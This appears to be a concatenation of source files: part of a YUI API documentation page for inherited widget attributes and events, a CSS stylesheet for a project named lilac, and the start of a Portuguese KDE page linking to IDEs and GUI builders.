<div id="attr_tabIndex" class="attr item inherited">
<a name="config_tabIndex"></a>
<h3 class="name"><code>tabIndex</code></h3>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_tabIndex">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l202"><code>widget/js/Widget.js:202</code></a>
</p>
</div>
<div class="description">
<p>Number (between -32767 to 32767) indicating the widget's
position in the default tab flow. The value is used to set the
"tabIndex" attribute on the widget's bounding box. Negative values allow
the widget to receive DOM focus programmatically (by calling the focus
method), while being removed from the default tab flow. A value of
null removes the "tabIndex" attribute from the widget's bounding box.</p>
</div>
<p><strong>Default:</strong> null</p>
<div class="emits box">
<h4>Fires event <code>tabIndexChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>tabIndex</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_visible" class="attr item inherited">
<a name="config_visible"></a>
<h3 class="name"><code>visible</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_visible">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l242"><code>widget/js/Widget.js:242</code></a>
</p>
</div>
<div class="description">
<p>Boolean indicating whether or not the Widget is visible.</p>
</div>
<p><strong>Default:</strong> TRUE</p>
<div class="emits box">
<h4>Fires event <code>visibleChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>visible</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_width" class="attr item inherited">
<a name="config_width"></a>
<h3 class="name"><code>width</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#attr_width">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l263"><code>widget/js/Widget.js:263</code></a>
</p>
</div>
<div class="description">
<p>String with units, or number, representing the width of the Widget. If a number is provided,
the default unit, defined by the Widgets DEF_UNIT, property is used.</p>
</div>
<p><strong>Default:</strong> EMPTY_STR</p>
<div class="emits box">
<h4>Fires event <code>widthChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>width</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_x" class="attr item inherited">
<a name="config_x"></a>
<h3 class="name"><code>x</code></h3>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#attr_x">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l50"><code>widget-position/js/Widget-Position.js:50</code></a>
</p>
</div>
<div class="description">
<p>Page X co-ordinate for the widget. This attribute acts as a facade for the
xy attribute. Changes in position can be monitored by listening for xyChange events.</p>
</div>
<p><strong>Default:</strong> 0</p>
<div class="emits box">
<h4>Fires event <code>xChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>x</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_xy" class="attr item inherited">
<a name="config_xy"></a>
<h3 class="name"><code>xy</code></h3>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#attr_xy">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l86"><code>widget-position/js/Widget-Position.js:86</code></a>
</p>
</div>
<div class="description">
<p>Page XY co-ordinate pair for the widget.</p>
</div>
<p><strong>Default:</strong> [0,0]</p>
<div class="emits box">
<h4>Fires event <code>xyChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>xy</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_y" class="attr item inherited">
<a name="config_y"></a>
<h3 class="name"><code>y</code></h3>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#attr_y">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l68"><code>widget-position/js/Widget-Position.js:68</code></a>
</p>
</div>
<div class="description">
<p>Page Y co-ordinate for the widget. This attribute acts as a facade for the
xy attribute. Changes in position can be monitored by listening for xyChange events.</p>
</div>
<p><strong>Default:</strong> 0</p>
<div class="emits box">
<h4>Fires event <code>yChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>y</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div id="attr_zIndex" class="attr item inherited">
<a name="config_zIndex"></a>
<h3 class="name"><code>zIndex</code></h3>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#attr_zIndex">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l86"><code>widget-stack/js/Widget-Stack.js:86</code></a>
</p>
</div>
<div class="description">
<p>The z-index to apply to the Widgets boundingBox. Non-numerical values for
zIndex will be converted to 0</p>
</div>
<p><strong>Default:</strong> 0</p>
<div class="emits box">
<h4>Fires event <code>zIndexChange</code></h4>
<p>
Fires when the value for the configuration attribute <code>zIndex</code> is
changed. You can listen for the event using the <code>on</code> method if you
wish to be notified before the attribute's value has changed, or
using the <code>after</code> method if you wish to be notified after the
attribute's value has changed.
</p>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
An Event Facade object with the following
attribute-specific properties added:
</div>
<ul class="params-list">
<li class="param">
<code class="param-name">prevVal</code>
<span class="type">Any</span>
<div class="param-description">The value of the attribute, prior to it being set.</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">The value the attribute is to be set to.</div>
</li>
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">The name of the attribute being set.</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">If setting a property within the attribute's value, the name of the sub-attribute property being set.</div>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
</div>
<div id="events" class="api-class-tabpanel">
<h2 class="off-left">Events</h2>
<div id="event_destroy" class="events item inherited">
<h3 class="name"><code>destroy</code></h3>
<span class="type"></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Base.html#event_destroy">Base</a>:
<a href="../files/base_js_Base.js.html#l285"><code>base/js/Base.js:285</code></a>
</p>
</div>
<div class="description">
<p>
Lifecycle event for the destroy phase,
fired prior to destruction. Invoking the preventDefault
method on the event object provided to subscribers will
prevent destruction from proceeding.
</p>
<p>
Subscribers to the "after" moment of this event, will be notified
after destruction is complete (and as a result cannot prevent
destruction).
</p>
</div>
<div class="params">
<h4>Event Payload:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>Event object</p>
</div>
</li>
</ul>
</div>
</div>
<div id="event_init" class="events item inherited">
<h3 class="name"><code>init</code></h3>
<span class="type"></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Base.html#event_init">Base</a>:
<a href="../files/base_js_Base.js.html#l202"><code>base/js/Base.js:202</code></a>
</p>
</div>
<div class="description">
<p>
Lifecycle event for the init phase, fired prior to initialization.
Invoking the preventDefault() method on the event object provided
to subscribers will prevent initialization from occuring.
</p>
<p>
Subscribers to the "after" momemt of this event, will be notified
after initialization of the object is complete (and therefore
cannot prevent initialization).
</p>
</div>
<div class="params">
<h4>Event Payload:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>Event object, with a cfg property which
refers to the configuration object passed to the constructor.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="event_widget:contentUpdate" class="events item inherited">
<h3 class="name"><code>widget:contentUpdate</code></h3>
<span class="type"></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#event_widget:contentUpdate">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l397"><code>widget/js/Widget.js:397</code></a>
</p>
</div>
<div class="description">
<p>Notification event, which widget implementations can fire, when
they change the content of the widget. This event has no default
behavior and cannot be prevented, so the "on" or "after"
moments are effectively equivalent (with on listeners being invoked before
after listeners).</p>
</div>
<div class="params">
<h4>Event Payload:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The Event Facade</p>
</div>
</li>
</ul>
</div>
</div>
<div id="event_widget:render" class="events item inherited">
<h3 class="name"><code>widget:render</code></h3>
<span class="type"></span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#event_widget:render">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l541"><code>widget/js/Widget.js:541</code></a>
</p>
</div>
<div class="description">
<p>Lifecycle event for the render phase, fired prior to rendering the UI
for the widget (prior to invoking the widget's renderer method).</p>
<p>
Subscribers to the "on" moment of this event, will be notified
before the widget is rendered.
</p>
<p>
Subscribers to the "after" moment of this event, will be notified
after rendering is complete.
</p>
</div>
<div class="params">
<h4>Event Payload:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The Event Facade</p>
</div>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="../assets/vendor/prettify/prettify-min.js"></script>
<script>prettyPrint();</script>
<script src="../assets/js/yui-prettify.js"></script>
<script src="../assets/../api.js"></script>
<script src="../assets/js/api-filter.js"></script>
<script src="../assets/js/api-list.js"></script>
<script src="../assets/js/api-search.js"></script>
<script src="../assets/js/apidocs.js"></script>
</body>
</html>
|
style/lilac.css
|
QuentinHoarau/lilac
|
html, body {
font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
background: #fff;
font-size: 0.9em;
min-width: 900px;
font-size: 11px;
margin: 5px;
}
strong {
font-weight: bold;
}
a {
text-decoration: none;
font-weight: bold;
color: #4e518d;
font-size: 13px;
}
em {
font-style: italic;
}
p {
margin: 5px;
}
a:hover {
text-decoration: underline;
}
.clear {
clear: both;
}
.shaded {
margin: 2px;
padding: 4px;
background: #f0f0f0;
border: 1px solid #e0e0e0;
}
#main {
margin: 10px;
margin-top: 40px;
}
h3 {
font-size: 14px;
font-weight: bold;
}
#search {
float: right;
color: black;
font-size: 0.5em;
margin-right: 5px;
}
.roundedcorner_success_content a:hover {
text-decoration: none;
}
.tablelist {
width: 100%;
}
.tablelist thead td {
font-weight: bold;
}
.tablelist td {
background: #f0f0f0;
padding: 4px;
border: 1px solid #d0d0d0;
}
.tablelist tr.alt {
background: #e0e0e0;
}
#search span {
padding-left: 20px;
line-height: 16px;
}
#search input {
position: relative;
border:1px solid #DDDDDD;
background-color:#EEEEEE;
font-size: 10px;
margin-top:7px;
padding:5px 7px;
width:200px;
}
a.networkadd {
float: right;
}
.formbox {
padding: 5px;
border-top: 1px dashed #ccc;
clear: both;
}
.formelement {
float: left;
width: 100%;
}
.formelement .formcontent.toggle {
margin-right: 205px;
}
.formtoggle {
width: 200px;
margin-left: -200px;
float: left;
}
#header {
height: 60px;
line-height: 60px;
color: white;
font-size: 2em;
font-weight: bold;
border-width: 0px 0px 7px 0px;
border-style: solid;
margin-left: 20px;
margin-right: 20px;
}
#header h1 {
padding-bottom: 9px;
margin: 15px 0 20px;
border-bottom: 1px solid #eee;
font-size: 36px;
font-family: inherit;
font-weight: 500;
line-height: 1.1;
color: black;
}
#navigation {
margin-left: 20px;
margin-right: 20px;
}
#navigation ul {
margin: 0;
padding: 0;
list-style: none;
float: right;
}
#navigation ul li {
float: left;
}
#navigation ul li a {
display: block;
margin-right: 3px;
padding: 0 1em;
line-height: 2.1em;
text-decoration: none;
font-weight: bold;
color: #4e518d;
font-size: 13px;
}
.lilacheader {
background: blue;
}
.lilacheader {
font-size: 2em;
font-weight: bold;
border-width: 0px 0px 1px 0px;
background: #6699CC;
border-style: solid;
border-color: grey;
padding: 3px;
}
.lilacwindow {
margin: 10px;
border-style: solid;
border-width: 1px;
border-color: grey black grey black;
}
.lilacwindowheader {
padding: 2px;
color: white;
font-weight: bold;
background: #C8A2C8;
border-width: 0px 0px 1px 0px;
border-color: grey;
border-style: solid;
}
.jobs {
width: 100%;
}
.lilacwindowcontent {
padding: 3px;
}
.subnav {
font-size: 0.9em;
font-weight: normal;
margin-left: -5px;
}
.subnav a {
font-weight: normal;
font-size: 11px;
}
.subnav li{
float: left;
margin-right: 15px;
padding-bottom: 5px;
}
.subnav li.selected {
font-weight: bold;
text-decoration: underline;
}
.listing {
width: 100%;
border: 1px;
border-spacing: 0px;
border-collapse: collapse;
}
tr.altTop td {
font-weight: bold;
border-bottom: 1px solid #aaaaaa;
margin: 0px;
}
tr.altRow1:hover *, tr.altRow2:hover * {
background-color: #b5bedf;
cursor: pointer;
}
tr.altRow1 {
background-color: #cccccc;
border-bottom: 1px solid #aaaaaa;
margin: 0px;
}
tr.altRow2 {
background-color: #f0f0f0;
border-bottom: 1px solid #aaaaaa;
margin: 0px;
}
.doublePane {
width: 100%;
border-spacing: 0px;
border-collapse: collapse;
}
.lilac-tree-server {
background-image:url(../images/tree-server.gif);
}
.calendar {
border-spacing: 0px;
border-collapse: collapse;
}
.calendar, .calendar td {
border: 1px solid gray;
}
.calendar td {
margin: 0px;
font-size: 0.8em;
width: 30px;
height: 30px;
}
.calendarnoday {
background: gray;
}
.addons {
width: 100%;
}
.addon {
background: #ccc;
padding: 4px;
border: 1px solid grey;
border-width: 1px 0px;
}
.addon .title {
font-weight: bold;
}
.roundedcorner_lilac_box {
margin: 10px;
}
.roundedcorner_lilac_top div, .roundedcorner_lilac_top,
.roundedcorner_lilac_bottom div, .roundedcorner_lilac_bottom {
width: 100%;
height: 10px;
font-size: 1px;
}
.roundedcorner_lilac_content { margin: 0 10px; background: white; }
.roundedcorner_lilac_content h2 {
color: black;
padding-top: 10px;
padding-bottom: 2px;
padding-left: 10px;
margin-bottom: 10px;
font-weight:bold;
border-bottom: 1px solid #AAAAAA;
text-transform:uppercase;
font-size: 10px;
}
.roundedcorner_inner_box {
background: #fff;
margin: 0px;
}
.roundedcorner_inner_top div, .roundedcorner_inner_top,
.roundedcorner_inner_bottom div, .roundedcorner_inner_bottom {
width: 100%;
height: 10px;
font-size: 1px;
}
.roundedcorner_inner_content { margin: 0 10px; }
.roundedcorner_error_box {
background: #FF0033;
margin: 10px;
color: white;
font-weight: bold;
}
.roundedcorner_error_top div {
background: url(../images/roundedcorner_error_tl.png) no-repeat top left;
}
.roundedcorner_error_top {
background: url(../images/roundedcorner_error_tr.png) no-repeat top right;
}
.roundedcorner_error_bottom div {
background: url(../images/roundedcorner_error_bl.png) no-repeat bottom left;
}
.roundedcorner_error_bottom {
background: url(../images/roundedcorner_error_br.png) no-repeat bottom right;
}
.roundedcorner_error_top div, .roundedcorner_error_top,
.roundedcorner_error_bottom div, .roundedcorner_error_bottom {
width: 100%;
height: 10px;
font-size: 1px;
}
.roundedcorner_error_content { margin: 0 10px; }
.roundedcorner_success_box {
background: #66cc66;
margin: 10px;
color: white;
font-weight: bold;
}
.roundedcorner_success_top div {
background: url(../images/roundedcorner_success_tl.png) no-repeat top left;
}
.roundedcorner_success_top {
background: url(../images/roundedcorner_success_tr.png) no-repeat top right;
}
.roundedcorner_success_bottom div {
background: url(../images/roundedcorner_success_bl.png) no-repeat bottom left;
}
.roundedcorner_success_bottom {
background: url(../images/roundedcorner_success_br.png) no-repeat bottom right;
}
.roundedcorner_success_top div, .roundedcorner_success_top,
.roundedcorner_success_bottom div, .roundedcorner_success_bottom {
width: 100%;
height: 10px;
font-size: 1px;
}
.roundedcorner_success_content { margin: 0 10px; }
.roundedcorner_warning_box {
background: #ffff99;
margin: 10px;
color: black;
font-weight: bold;
}
.roundedcorner_warning_top div {
background: url(../images/roundedcorner_warning_tl.png) no-repeat top left;
}
.roundedcorner_warning_top {
background: url(../images/roundedcorner_warning_tr.png) no-repeat top right;
}
.roundedcorner_warning_bottom div {
background: url(../images/roundedcorner_warning_bl.png) no-repeat bottom left;
}
.roundedcorner_warning_bottom {
background: url(../images/roundedcorner_warning_br.png) no-repeat bottom right;
}
.roundedcorner_warning_top div, .roundedcorner_warning_top,
.roundedcorner_warning_bottom div, .roundedcorner_warning_bottom {
width: 100%;
height: 10px;
font-size: 1px;
}
.roundedcorner_warning_content { margin: 0 10px; }
.icon-monitor-edit {
background: transparent url(../images/icons/monitor_edit.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-application-home {
background: transparent url(../images/icons/application_home.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-book {
background: transparent url(../images/icons/book.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-clock {
background: transparent url(../images/icons/clock.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-application-lightning {
background: transparent url(../images/icons/application_lightning.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-user {
background: transparent url(../images/icons/user.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-group {
background: transparent url(../images/icons/group.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-server-link {
background: transparent url(../images/icons/server_link.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-brick {
background: transparent url(../images/icons/brick.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-database-save {
background: transparent url(../images/icons/database_save.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-database-lightning {
background: transparent url(../images/icons/database_lightning.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-package {
background: transparent url(../images/icons/package.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-server-go {
background: transparent url(../images/icons/server_go.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-computer-add {
background: transparent url(../images/icons/computer_add.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-bricks {
background: transparent url(../images/icons/bricks.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
.icon-database-go {
background: transparent url(../images/icons/database-go.png) no-repeat top left;
padding-left: 20px;
line-height: 16px;
}
li.general {
float: left;
margin: 10px;
width: 320px;
min-height: 50px;
}
.roundedcorner_lilac_box {
margin: 10px;
}
.nicebutton, input[type=submit], input[type=button] {
color: #555555;
font-size: 10px;
border: 1px solid #d3d3d3;
padding: .2em .6em .3em .6em;
line-height: 1.4em;
cursor: pointer;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
ms-border-radius: 4px;
border-radius: 4px;
width:auto;
overflow:visible;
text-transform:capitalize;
font-family: Verdana,Arial,sans-serif/*{ffDefault}*/;
}
input[type=submit]:hover, input[type=button]:hover {
color: #212121;
border: 1px solid #999999;
}
input[type=submit]:active, input[type=button]:active {
color: #222222;
border: 1px solid #dddddd;
}
|
lang/pt/links_tools.html
|
KDE/kdev-www
|
<?php module_head("Links to other develoment tools");?>
<br>
<h4>Ambientes de Desenvolvimento Integrados (IDEs em inglês)</h4>
<table width="100%" border=0 cellspacing=2 cellpadding=2>
<tr align=left>
<th class=header>Link</th>
<th class=header width="100%">Comentário</th>
</tr>
<tr valign=top>
<td class=even><a HREF="http://www.eclipse.org/">Eclipse</a></td>
<td class=even>um IDE aberto e extensível para qualquer coisa e para nada em particular</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://www.newplanetsoftware.com/jcc/">Code Crusader</a></td>
<td class=odd>um IDE OpenSource da New Planet Software</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://vdkbuilder.sourceforge.net/">VDK Builder</a></td>
<td class=even>uma ferramenta de Desenvolvimento Rápido de Aplicações (RAD) baseada no VDK</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://primates.ximian.com/~jpr/gide/">gIDE</a></td>
<td class=odd>para desenvolvimento em C/GNOME (o Anjuta parece superar o gIDE)</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://www.anjuta.org/">Anjuta</a></td>
<td class=even>um IDE de C/C++ para GNU/Linux. Foi escrito para GTK/GNOME</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://www.rhide.com/">RHIDE</a></td>
<td class=odd>um IDE para DJGPP e outros sistemas baseados em GNU</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://www.identicalsoftware.com/xwpe/">XWPE</a></td>
<td class=even>um ambiente de desenvolvimento para sistemas UNIX</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://wxstudio.sourceforge.net/">wxstudio</a></td>
<td class=odd>um ambiente de desenvolvimento integrado multiplataforma </td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://sourcenav.sourceforge.net/">Source-Navigator</a></td>
<td class=even>uma ferramenta GPL para análise de código</td>
</tr>
</table>
<br>
<h4>Geradores de Interface Gráfica (GUI em inglês)</h4>
<table width="100%" border=0 cellspacing=2 cellpadding=2>
<tr align=left>
<th class=header>Link</th>
<th class=header width="100%">Comentário</th>
</tr>
<tr valign=top>
<td class=even><a HREF="http://www.trolltech.com/products/qt/designer.html">Qt Designer</a></td>
<td class=even>um gerador de interfaces Qt</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://qtarch.sourceforge.net/">QT-Architect</a></td>
<td class=odd>um versátil arquitecto de ecrãs para componentes Qt</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://web.inter.nl.net/users/eavdmeer/">EBuilder</a></td>
<td class=even>uma forma rápida, eficiente e fácil de usar para desenhar graficamente componentes para a biblioteca GUI da Qt</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://glade.gnome.org/">Glade</a></td>
<td class=odd>gerador de interfaces GTK+</td>
</tr>
</table>
<br>
<h4>Outros</h4>
<table width="100%" border=0 cellspacing=2 cellpadding=2>
<tr align=left>
<th class=header>Link</th>
<th class=header width="100%">Comentário</th>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://members.nextra.at/johsixt//kdbg.html">KDbg</a></td>
<td class=odd>um <i>debugger</i> para KDE</td>
</tr>
